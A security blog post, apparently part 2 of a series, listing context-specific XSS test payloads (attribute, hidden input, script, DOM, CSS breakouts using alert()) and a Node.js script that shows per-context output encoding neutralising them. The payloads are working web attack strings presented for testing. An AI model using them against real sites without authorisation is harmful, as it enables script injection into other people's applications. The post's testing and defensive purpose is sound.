Test_xss_the_rightway_2

Navneet
3 min read, Apr 16, 2019

In part 1 of this series we saw that the generic payload <script>alert('XSS')</script> used to test for XSS does not execute in every context: inside an HTML attribute, a hidden input, a JavaScript block and so on it is just data. In this post we look at the payloads that do work in each of those contexts, so that we can conclude reliably whether XSS is present.

Let us look at the payload to use in each context.

1. Context — body

Payload — <script>alert('xss')</script>

[screenshots: test page, result page]

2. Context — HTML attribute

Payload — " onmouseover=alert('xss')

[screenshots: test page, result page]

3. Context — hidden variable

Payload — " accesskey="X" onclick="alert('XSS')

[screenshots: test page, result page]

Notes

1. Chrome (73) does not appear to be vulnerable to this payload.

2. You have to press Alt+Shift+X (the accesskey) to get the pop-up box. For more details check here.

4. Context — JavaScript

Payload — </script> <script>alert('xss')</script>

[screenshots: test page, result page]

5. Context — DOM

Payload — <script>alert(%27xss%27)</script>

[screenshot: test and result page]

6. Context — CSS

Payload — } </style> <script>alert('xss')</script>

[screenshots: test page, result page]

Therefore, it is imperative to watch where the user input is inserted and to choose the payload accordingly. We cannot just blindly submit <script>alert('XSS')</script> and conclude from that alone whether an app is vulnerable to XSS.
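The same observation drives the defence: the reason the generic payload fails in one context and a tailored one succeeds is exactly why output encoding has to be chosen per context, not applied once for the whole page. The following is an added example, not code from this post or from its sample application on GitHub. It is a small Node.js script that models each of the six insertion points above as a template, applies the encoder appropriate to that context, and checks whether each of the post's payloads still changes the structure of the output. It also covers one caveat the attribute payload makes obvious: entity-encoding an unquoted attribute value is not enough, because the first space still starts a new attribute. All helper and function names (encodeHtml, encodeJsString, encodeCss, attributeNames, render, isNeutralized, evaluateAll) are this example's own.

```javascript
// Added example (not code from the original post or its sample app): the six
// contexts above modelled as string templates, with one encoder per context.

// The post's payloads, one per context. The DOM one arrives URL-encoded.
const PAYLOADS = {
  body:       "<script>alert('xss')</script>",
  attribute:  "\" onmouseover=alert('xss')",
  hidden:     "\" accesskey=\"X\" onclick=\"alert('XSS')",
  javascript: "</script> <script>alert('xss')</script>",
  dom:        "<script>alert(%27xss%27)</script>",
  css:        "} </style> <script>alert('xss')</script>",
};

// Where the input lands (assumed templates). `dom` models a sink that does
// el.innerHTML = decodeURIComponent(param); the safe sink is el.textContent,
// which is equivalent to HTML-encoding the value.
const TEMPLATES = {
  body:       (x) => `<div>${x}</div>`,
  attribute:  (x) => `<input type="text" value="${x}">`,
  hidden:     (x) => `<input type="hidden" name="ref" value="${x}">`,
  javascript: (x) => `<script>var user = '${x}';</script>`,
  dom:        (x) => `<div id="out">${x}</div>`,
  css:        (x) => `<style>.user { color: ${x}; }</style>`,
};

// HTML body and quoted-attribute context: entity-encode the five specials.
function encodeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}
// JavaScript string context: \xHH or \uHHHH for everything but [A-Za-z0-9].
function encodeJsString(s) {
  return s.replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100 ? "\\x" + code.toString(16).padStart(2, "0")
                        : "\\u" + code.toString(16).padStart(4, "0");
  });
}
// CSS value context: \HH escape, terminated by a space.
function encodeCss(s) {
  return s.replace(/[^A-Za-z0-9]/g, (c) => "\\" + c.charCodeAt(0).toString(16) + " ");
}
const ENCODERS = {
  body: encodeHtml, attribute: encodeHtml, hidden: encodeHtml,
  javascript: encodeJsString, dom: encodeHtml, css: encodeCss,
};

// Minimal attribute tokenizer for one start tag, following the browser's rules:
// a name ends at whitespace or "=", a quoted value runs to its closing quote,
// an unquoted value runs to the next whitespace (which then starts a new attribute).
function attributeNames(tag) {
  const inner = tag.slice(tag.indexOf(" ") + 1, tag.lastIndexOf(">"));
  const names = [];
  let i = 0;
  const skipWs = () => { while (i < inner.length && /\s/.test(inner[i])) i++; };
  while (skipWs(), i < inner.length) {
    const start = i;
    while (i < inner.length && !/[\s=]/.test(inner[i])) i++;
    names.push(inner.slice(start, i).toLowerCase());
    skipWs();
    if (inner[i] !== "=") continue;
    i++; skipWs();
    if (inner[i] === '"' || inner[i] === "'") {
      const q = inner[i++];
      while (i < inner.length && inner[i] !== q) i++;
      i++;
    } else {
      while (i < inner.length && !/\s/.test(inner[i])) i++;
    }
  }
  return names;
}

// Evidence that the input changed the document structure, per context. The
// <script> and <style> templates each contain exactly one closing tag, so a
// second one means the payload closed the raw-text element early.
const BROKE_OUT = {
  body:       (out) => /<script/i.test(out),
  dom:        (out) => /<script/i.test(out),
  attribute:  (out) => attributeNames(out).some((n) => n.startsWith("on")),
  hidden:     (out) => attributeNames(out).some((n) => n.startsWith("on")),
  javascript: (out) => (out.match(/<\/script/gi) || []).length > 1,
  css:        (out) => (out.match(/<\/style/gi) || []).length > 1,
};

function render(context, input, encode) {
  const raw = context === "dom" ? decodeURIComponent(input) : input;
  return TEMPLATES[context](encode ? ENCODERS[context](raw) : raw);
}
function isNeutralized(context, rendered) {
  return !BROKE_OUT[context](rendered);
}

// Each payload in its own context, inserted verbatim and then encoded for that
// context. true means the payload stayed data.
function evaluateAll() {
  const results = {};
  for (const context of Object.keys(PAYLOADS)) {
    results[context] = {
      unencoded: isNeutralized(context, render(context, PAYLOADS[context], false)),
      encoded:   isNeutralized(context, render(context, PAYLOADS[context], true)),
    };
  }
  return results;
}

// Caveat: encoding alone does not save an unquoted attribute. Entities are
// decoded inside the value and the first space ends it, so the encoded
// attribute payload still yields a new on* attribute. Always quote attributes.
function unquotedAttributeStillBreaks() {
  return !isNeutralized("attribute", `<input value=${encodeHtml(PAYLOADS.attribute)}>`);
}

console.log(evaluateAll(), { unquotedAttributeStillBreaks: unquotedAttributeStillBreaks() });
```

Run it with node: the unencoded result is false for every context (each of the post's payloads altered the structure at its own insertion point) and the encoded result is true, while the unquoted-attribute check stays true despite encoding. The tokenizer only handles a single start tag; it stands in for what the browser's parser does with quoted versus unquoted attribute values, which is what makes the attribute and hidden-field payloads work in the first place.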

The sample web application used for this demonstration is available for download on GitHub.
